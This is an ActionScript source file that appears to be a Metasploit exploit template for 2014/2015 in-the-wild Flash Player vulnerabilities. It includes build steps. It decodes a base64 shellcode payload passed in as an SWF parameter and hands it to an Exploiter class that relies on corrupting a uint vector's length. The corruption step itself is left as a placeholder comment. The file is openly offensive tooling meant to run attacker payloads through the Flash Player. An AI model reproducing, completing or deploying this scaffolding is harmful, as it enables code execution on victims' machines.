/* 
Code to assist the creation of exploits for the trend of Flash vulnerabilities used in the wild along 2014/2015.

It uses some ideas and code included on @hdarwin89 proof of concepts.

* How to build:
    1. Download the AIRSDK, and use its compiler.
    2. Download the Flex SDK (4.6)
    3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
        (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
    4. Build with: mxmlc -o msf.swf Exploit.as

*/

package
{
    import flash.display.Sprite
    import flash.display.LoaderInfo
    import mx.utils.Base64Decoder
    import flash.utils.ByteArray

    public class Exploit extends Sprite
	{
		private var uv:Vector.<uint>
        private var b64:Base64Decoder = new Base64Decoder()
        private var payload:ByteArray
        private var platform:String
        private var exploiter:Exploiter
                
        public function Exploit()
        {
            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
            var pattern:RegExp = / /g;
            b64_payload = b64_payload.replace(pattern, "+")
            b64.decode(b64_payload)
            payload = b64.toByteArray()
              
            /* 
                The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
            */
            
            exploiter = new Exploiter(this, platform, payload, uv, 0x13e)
        }
    }
}
